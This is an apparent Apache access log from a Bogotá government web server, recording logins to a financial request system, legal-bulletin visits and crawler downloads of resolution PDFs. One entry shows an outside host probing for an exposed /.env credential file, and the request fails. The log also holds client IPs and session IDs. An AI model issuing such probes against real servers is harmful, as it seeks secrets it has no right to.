191.104.155.209 - - [23/Feb/2024:04:37:30 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 302 -
191.104.155.209 - - [23/Feb/2024:04:37:30 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
191.104.155.209 - - [23/Feb/2024:04:37:30 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 302 -
191.104.155.209 - - [23/Feb/2024:04:37:30 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
191.104.155.209 - - [23/Feb/2024:04:37:38 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12727
191.104.155.209 - - [23/Feb/2024:04:37:38 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
191.104.155.209 - - [23/Feb/2024:04:37:38 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css;jsessionid=SPPbYJpsWmXQvzpMec7LputG.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 542
191.104.155.209 - - [23/Feb/2024:04:37:38 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css;jsessionid=SPPbYJpsWmXQvzpMec7LputG.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
191.104.155.209 - - [23/Feb/2024:04:37:38 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=SPPbYJpsWmXQvzpMec7LputG.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
191.104.155.209 - - [23/Feb/2024:04:37:38 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=SPPbYJpsWmXQvzpMec7LputG.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
191.104.155.209 - - [23/Feb/2024:04:37:38 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
191.104.155.209 - - [23/Feb/2024:04:37:38 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js;jsessionid=SPPbYJpsWmXQvzpMec7LputG.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
191.104.155.209 - - [23/Feb/2024:04:37:38 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js;jsessionid=SPPbYJpsWmXQvzpMec7LputG.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
191.104.155.209 - - [23/Feb/2024:04:37:39 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
191.104.155.209 - - [23/Feb/2024:04:37:39 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 26770
191.104.155.209 - - [23/Feb/2024:04:37:39 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 26770
191.104.155.209 - - [23/Feb/2024:04:37:39 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
191.104.155.209 - - [23/Feb/2024:04:37:39 -0500] "GET /sipse/faces/faces/index.xhtml HTTP/1.1" 200 677
191.104.155.209 - - [23/Feb/2024:04:37:39 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.104.155.209 - - [23/Feb/2024:04:37:39 -0500] "GET /sipse/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12405
191.104.155.209 - - [23/Feb/2024:04:37:39 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.104.155.209 - - [23/Feb/2024:04:37:39 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.104.155.209 - - [23/Feb/2024:04:37:39 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
191.104.155.209 - - [23/Feb/2024:04:37:39 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.104.155.209 - - [23/Feb/2024:04:37:39 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.104.155.209 - - [23/Feb/2024:04:37:39 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.104.155.209 - - [23/Feb/2024:04:37:39 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.104.155.209 - - [23/Feb/2024:04:37:39 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
78.153.140.175 - - [23/Feb/2024:04:37:40 -0500] "GET /.env HTTP/1.1" 404 1034
191.104.155.209 - - [23/Feb/2024:04:37:41 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16283
191.104.155.209 - - [23/Feb/2024:04:37:41 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
191.104.155.209 - - [23/Feb/2024:04:37:41 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.104.155.209 - - [23/Feb/2024:04:37:41 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.104.155.209 - - [23/Feb/2024:04:37:41 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.104.155.209 - - [23/Feb/2024:04:37:41 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.104.155.209 - - [23/Feb/2024:04:37:41 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 33071
191.104.155.209 - - [23/Feb/2024:04:37:41 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 21242
191.104.155.209 - - [23/Feb/2024:04:37:41 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
191.104.155.209 - - [23/Feb/2024:04:37:41 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 200 27209
191.104.155.209 - - [23/Feb/2024:04:37:47 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 200 183
191.104.155.209 - - [23/Feb/2024:04:37:47 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 1471
191.104.155.209 - - [23/Feb/2024:04:37:48 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 62239
191.104.155.209 - - [23/Feb/2024:04:37:48 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.104.155.209 - - [23/Feb/2024:04:37:48 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.104.155.209 - - [23/Feb/2024:04:37:48 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.104.155.209 - - [23/Feb/2024:04:37:48 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.104.155.209 - - [23/Feb/2024:04:37:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
201.245.192.253 - - [23/Feb/2024:04:38:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
191.104.155.209 - - [23/Feb/2024:04:38:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5240
191.104.155.209 - - [23/Feb/2024:04:38:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 147061
191.104.155.209 - - [23/Feb/2024:04:38:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.104.155.209 - - [23/Feb/2024:04:38:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.104.155.209 - - [23/Feb/2024:04:38:23 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.104.155.209 - - [23/Feb/2024:04:38:23 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.104.155.209 - - [23/Feb/2024:04:39:05 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 89784
191.104.155.209 - - [23/Feb/2024:04:39:27 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5577
191.104.155.209 - - [23/Feb/2024:04:39:28 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 200 120512
191.104.155.209 - - [23/Feb/2024:04:39:46 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5566
201.245.192.253 - - [23/Feb/2024:04:40:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [23/Feb/2024:04:40:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39000
201.245.192.253 - - [23/Feb/2024:04:40:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37557
201.245.192.253 - - [23/Feb/2024:04:40:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37581
201.245.192.253 - - [23/Feb/2024:04:41:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37557
40.77.167.230 - - [23/Feb/2024:04:41:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/4188.pdf HTTP/1.1" 200 397400
172.22.2.4 - - [23/Feb/2024:04:40:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [23/Feb/2024:04:42:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [23/Feb/2024:04:42:21 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2024:04:41:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
40.77.167.230 - - [23/Feb/2024:04:43:39 -0500] "GET /sitemap.xml.gz HTTP/1.1" 404 1018
66.249.77.9 - - [23/Feb/2024:04:44:03 -0500] "GET /BLA/resoluciones/AUTOS%202008/1949.pdf HTTP/1.1" 200 100174
201.245.192.253 - - [23/Feb/2024:04:44:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
191.104.155.209 - - [23/Feb/2024:04:45:55 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 34588
191.104.155.209 - - [23/Feb/2024:04:45:55 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.104.155.209 - - [23/Feb/2024:04:45:55 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.104.155.209 - - [23/Feb/2024:04:45:55 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.104.155.209 - - [23/Feb/2024:04:45:55 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.61.253 - - [23/Feb/2024:04:45:56 -0500] "GET /guadalupe-aguanoso-y-otros-senderos-disponibles-para-el-disfrute-de-los-ciudadanos.html?fbclid=IwAR1sBfkvj6LdbT7twfuUBHxT0Bm-y7mUfXOYxi6N_nAeDN-LDToYwk8979Y HTTP/1.1" 200 873
191.104.155.209 - - [23/Feb/2024:04:45:56 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 27862
191.104.155.209 - - [23/Feb/2024:04:45:56 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 27862
191.104.155.209 - - [23/Feb/2024:04:45:56 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1392
191.104.155.209 - - [23/Feb/2024:04:45:56 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1388
191.104.155.209 - - [23/Feb/2024:04:45:56 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1400
191.104.155.209 - - [23/Feb/2024:04:46:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 2373
191.104.155.209 - - [23/Feb/2024:04:46:04 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 32397
191.104.155.209 - - [23/Feb/2024:04:46:05 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5248
191.104.155.209 - - [23/Feb/2024:04:46:07 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 147105
191.104.155.209 - - [23/Feb/2024:04:46:08 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.104.155.209 - - [23/Feb/2024:04:46:08 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.104.155.209 - - [23/Feb/2024:04:46:08 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.104.155.209 - - [23/Feb/2024:04:46:08 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [23/Feb/2024:04:46:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
191.104.155.209 - - [23/Feb/2024:04:46:15 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 91630
191.104.155.209 - - [23/Feb/2024:04:47:04 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5577
191.104.155.209 - - [23/Feb/2024:04:47:04 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 200 120512
191.104.155.209 - - [23/Feb/2024:04:47:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5566
216.245.221.92 - - [23/Feb/2024:04:47:20 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2024:04:47:32 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17637
172.22.2.4 - - [23/Feb/2024:04:46:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2024:04:47:55 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [23/Feb/2024:04:47:55 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [23/Feb/2024:04:47:59 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
201.245.192.253 - - [23/Feb/2024:04:48:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [23/Feb/2024:04:46:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53419
201.245.192.253 - - [23/Feb/2024:04:50:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [23/Feb/2024:04:52:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [23/Feb/2024:04:52:20 -0500] "HEAD / HTTP/1.1" 200 -
52.70.240.171 - - [23/Feb/2024:04:52:26 -0500] "GET /BLA/resoluciones/AUTOS%202013/2538.pdf HTTP/1.1" 200 330047
3.224.220.101 - - [23/Feb/2024:04:52:30 -0500] "GET /BLA/resoluciones/AUTOS%202013/0720.pdf HTTP/1.1" 200 925928
23.22.35.162 - - [23/Feb/2024:04:52:34 -0500] "GET /BLA/resoluciones/AUTOS%202013/1771.pdf HTTP/1.1" 200 750039
3.224.220.101 - - [23/Feb/2024:04:52:38 -0500] "GET /BLA/resoluciones/AUTOS%202013/0127.pdf HTTP/1.1" 200 1928863
3.224.220.101 - - [23/Feb/2024:04:52:42 -0500] "GET /BLA/resoluciones/AUTOS%202013/3339.pdf HTTP/1.1" 200 663601
52.70.240.171 - - [23/Feb/2024:04:52:45 -0500] "GET /BLA/resoluciones/AUTOS%202013/0161.pdf HTTP/1.1" 200 3380609
52.70.240.171 - - [23/Feb/2024:04:52:51 -0500] "GET /BLA/resoluciones/AUTOS%202013/2058.pdf HTTP/1.1" 200 1867532
23.22.35.162 - - [23/Feb/2024:04:52:54 -0500] "GET /BLA/resoluciones/AUTOS%202013/1850.pdf HTTP/1.1" 200 310014
3.224.220.101 - - [23/Feb/2024:04:52:58 -0500] "GET /BLA/resoluciones/AUTOS%202013/0206.pdf HTTP/1.1" 200 1443381
3.224.220.101 - - [23/Feb/2024:04:53:04 -0500] "GET /BLA/resoluciones/AUTOS%202013/3418.pdf HTTP/1.1" 200 716107
23.22.35.162 - - [23/Feb/2024:04:53:06 -0500] "GET /BLA/resoluciones/AUTOS%202013/3589.pdf HTTP/1.1" 200 827700
23.22.35.162 - - [23/Feb/2024:04:53:11 -0500] "GET /BLA/resoluciones/AUTOS%202013/1178.pdf HTTP/1.1" 200 446319
3.224.220.101 - - [23/Feb/2024:04:53:15 -0500] "GET /BLA/resoluciones/AUTOS%202013/0283.pdf HTTP/1.1" 200 934767
191.156.153.107 - - [23/Feb/2024:04:53:17 -0500] "GET /guadalupe-aguanoso-y-otros-senderos-disponibles-para-el-disfrute-de-los-ciudadanos.html?fbclid=IwAR1jSCaMo-OkFB8fIYfQ40gpHjH4w-Cf8M9D-HH0w8pl4q1gGXw4ozyFM8Q_aem_Abu2fFnKl84-Q4h18S9ST5mpH5QaE4nHZe6LBCFZHcJ1nSrKenGLCklyYDomCoL8O8o HTTP/1.1" 200 873
3.224.220.101 - - [23/Feb/2024:04:53:18 -0500] "GET /BLA/resoluciones/AUTOS%202013/1987.pdf HTTP/1.1" 200 401611
52.70.240.171 - - [23/Feb/2024:04:53:22 -0500] "GET /BLA/resoluciones/AUTOS%202013/0970.pdf HTTP/1.1" 200 1672156
23.22.35.162 - - [23/Feb/2024:04:53:26 -0500] "GET /BLA/resoluciones/AUTOS%202013/0377.pdf HTTP/1.1" 200 130968
52.70.240.171 - - [23/Feb/2024:04:53:30 -0500] "GET /BLA/resoluciones/AUTOS%202013/2401.pdf HTTP/1.1" 200 980725
172.22.2.4 - - [23/Feb/2024:04:51:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
3.224.220.101 - - [23/Feb/2024:04:53:34 -0500] "GET /BLA/resoluciones/AUTOS%202013/1944.pdf HTTP/1.1" 200 1960047
23.22.35.162 - - [23/Feb/2024:04:53:38 -0500] "GET /BLA/resoluciones/AUTOS%202013/2651.pdf HTTP/1.1" 200 2310988
3.224.220.101 - - [23/Feb/2024:04:53:42 -0500] "GET /BLA/resoluciones/AUTOS%202013/3452.pdf HTTP/1.1" 200 371504
3.224.220.101 - - [23/Feb/2024:04:53:46 -0500] "GET /BLA/resoluciones/AUTOS%202013/0936.pdf HTTP/1.1" 200 1808130
23.22.35.162 - - [23/Feb/2024:04:53:50 -0500] "GET /BLA/resoluciones/AUTOS%202013/1737.pdf HTTP/1.1" 200 535241
23.22.35.162 - - [23/Feb/2024:04:53:54 -0500] "GET /BLA/resoluciones/AUTOS%202013/2745.pdf HTTP/1.1" 200 390138
52.70.240.171 - - [23/Feb/2024:04:53:58 -0500] "GET /BLA/resoluciones/AUTOS%202013/0240.pdf HTTP/1.1" 200 1652478
52.70.240.171 - - [23/Feb/2024:04:54:02 -0500] "GET /BLA/resoluciones/AUTOS%202013/0607.pdf HTTP/1.1" 200 1801573
3.224.220.101 - - [23/Feb/2024:04:54:06 -0500] "GET /BLA/resoluciones/AUTOS%202013/0490.pdf HTTP/1.1" 200 1553207
201.245.192.253 - - [23/Feb/2024:04:54:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
52.70.240.171 - - [23/Feb/2024:04:54:10 -0500] "GET /BLA/resoluciones/AUTOS%202013/1615.pdf HTTP/1.1" 200 1139860
23.22.35.162 - - [23/Feb/2024:04:54:14 -0500] "GET /BLA/resoluciones/AUTOS%202013/0562.pdf HTTP/1.1" 200 1862823
23.22.35.162 - - [23/Feb/2024:04:54:20 -0500] "GET /BLA/resoluciones/AUTOS%202013/3625.pdf HTTP/1.1" 200 347179
172.22.2.4 - - [23/Feb/2024:04:52:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
23.22.35.162 - - [23/Feb/2024:04:54:22 -0500] "GET /BLA/resoluciones/AUTOS%202013/1120.pdf HTTP/1.1" 200 1184876
23.22.35.162 - - [23/Feb/2024:04:54:26 -0500] "GET /BLA/resoluciones/AUTOS%202013/3668.pdf HTTP/1.1" 200 495793
3.224.220.101 - - [23/Feb/2024:04:54:30 -0500] "GET /BLA/resoluciones/AUTOS%202013/2171.pdf HTTP/1.1" 200 965381
208.100.26.249 - - [23/Feb/2024:04:54:33 -0500] "GET / HTTP/1.1" 200 319
3.224.220.101 - - [23/Feb/2024:04:54:35 -0500] "GET /BLA/resoluciones/AUTOS%202013/0528.pdf HTTP/1.1" 200 256741
52.70.240.171 - - [23/Feb/2024:04:54:38 -0500] "GET /BLA/resoluciones/AUTOS%202013/2286.pdf HTTP/1.1" 200 624742
52.70.240.171 - - [23/Feb/2024:04:54:42 -0500] "GET /BLA/resoluciones/AUTOS%202013/1658.pdf HTTP/1.1" 200 163296
23.22.35.162 - - [23/Feb/2024:04:54:46 -0500] "GET /BLA/resoluciones/AUTOS%202013/3294.pdf HTTP/1.1" 200 313871
3.224.220.101 - - [23/Feb/2024:04:54:50 -0500] "GET /BLA/resoluciones/AUTOS%202013/2322.pdf HTTP/1.1" 200 415952
191.156.59.129 - - [23/Feb/2024:04:54:51 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
191.156.54.75 - - [23/Feb/2024:04:54:51 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
191.156.59.129 - - [23/Feb/2024:04:54:51 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
191.156.54.75 - - [23/Feb/2024:04:54:51 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
191.156.59.129 - - [23/Feb/2024:04:54:51 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
191.156.59.129 - - [23/Feb/2024:04:54:51 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
23.22.35.162 - - [23/Feb/2024:04:54:55 -0500] "GET /BLA/resoluciones/AUTOS%202013/0535.pdf HTTP/1.1" 200 2217875
191.156.59.129 - - [23/Feb/2024:04:54:58 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
23.22.35.162 - - [23/Feb/2024:04:54:59 -0500] "GET /BLA/resoluciones/AUTOS%202013/0641.pdf HTTP/1.1" 200 2405074
52.70.240.171 - - [23/Feb/2024:04:55:01 -0500] "GET /BLA/resoluciones/AUTOS%202013/2137.pdf HTTP/1.1" 200 637560
191.156.59.129 - - [23/Feb/2024:04:55:02 -0500] "POST /appsia/controlador HTTP/1.1" 200 7789
191.156.59.129 - - [23/Feb/2024:04:55:06 -0500] "POST /appsia/controlador HTTP/1.1" 200 6662
23.22.35.162 - - [23/Feb/2024:04:55:07 -0500] "GET /BLA/resoluciones/AUTOS%202013/3188.pdf HTTP/1.1" 200 602745
3.224.220.101 - - [23/Feb/2024:04:55:10 -0500] "GET /BLA/resoluciones/AUTOS%202013/2209.pdf HTTP/1.1" 200 461792
52.167.144.145 - - [23/Feb/2024:04:55:11 -0500] "GET /BLA/resoluciones/AUTOS%202018/5281.pdf HTTP/1.1" 304 -
191.156.59.129 - - [23/Feb/2024:04:55:13 -0500] "POST /appsia/controlador HTTP/1.1" 200 10622
23.22.35.162 - - [23/Feb/2024:04:55:14 -0500] "GET /BLA/resoluciones/AUTOS%202013/3704.pdf HTTP/1.1" 200 382122
52.70.240.171 - - [23/Feb/2024:04:55:19 -0500] "GET /BLA/resoluciones/AUTOS%202013/0048.pdf HTTP/1.1" 200 1291080
52.70.240.171 - - [23/Feb/2024:04:55:23 -0500] "GET /BLA/resoluciones/AUTOS%202013/1692.pdf HTTP/1.1" 200 2648493
3.224.220.101 - - [23/Feb/2024:04:55:26 -0500] "GET /BLA/resoluciones/AUTOS%202013/2423.pdf HTTP/1.1" 200 1592714
23.22.35.162 - - [23/Feb/2024:04:55:30 -0500] "GET /BLA/resoluciones/AUTOS%202013/2250.pdf HTTP/1.1" 200 785746
3.224.220.101 - - [23/Feb/2024:04:55:34 -0500] "GET /BLA/resoluciones/AUTOS%202013/1077.pdf HTTP/1.1" 200 917885
52.70.240.171 - - [23/Feb/2024:04:55:39 -0500] "GET /BLA/resoluciones/AUTOS%202013/2601.pdf HTTP/1.1" 200 415787
23.22.35.162 - - [23/Feb/2024:04:55:43 -0500] "GET /BLA/resoluciones/AUTOS%202013/3445.pdf HTTP/1.1" 200 346908
3.224.220.101 - - [23/Feb/2024:04:55:46 -0500] "GET /BLA/resoluciones/AUTOS%202013/1415.pdf HTTP/1.1" 200 1739060
23.22.35.162 - - [23/Feb/2024:04:55:50 -0500] "GET /BLA/resoluciones/AUTOS%202013/3402.pdf HTTP/1.1" 200 578332
3.224.220.101 - - [23/Feb/2024:04:55:54 -0500] "GET /BLA/resoluciones/AUTOS%202013/3267.pdf HTTP/1.1" 200 581601
3.224.220.101 - - [23/Feb/2024:04:55:58 -0500] "GET /BLA/resoluciones/AUTOS%202013/2644.pdf HTTP/1.1" 200 663825
23.22.35.162 - - [23/Feb/2024:04:56:02 -0500] "GET /BLA/resoluciones/AUTOS%202013/2216.pdf HTTP/1.1" 200 473666
23.22.35.162 - - [23/Feb/2024:04:56:06 -0500] "GET /BLA/resoluciones/AUTOS%202013/3303.pdf HTTP/1.1" 200 933793
201.245.192.253 - - [23/Feb/2024:04:56:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
3.224.220.101 - - [23/Feb/2024:04:56:10 -0500] "GET /BLA/resoluciones/AUTOS%202013/3346.pdf HTTP/1.1" 200 851024
3.224.220.101 - - [23/Feb/2024:04:56:14 -0500] "GET /BLA/resoluciones/AUTOS%202013/2723.pdf HTTP/1.1" 200 916314
23.22.35.162 - - [23/Feb/2024:04:56:18 -0500] "GET /BLA/resoluciones/AUTOS%202013/2545.pdf HTTP/1.1" 200 817324
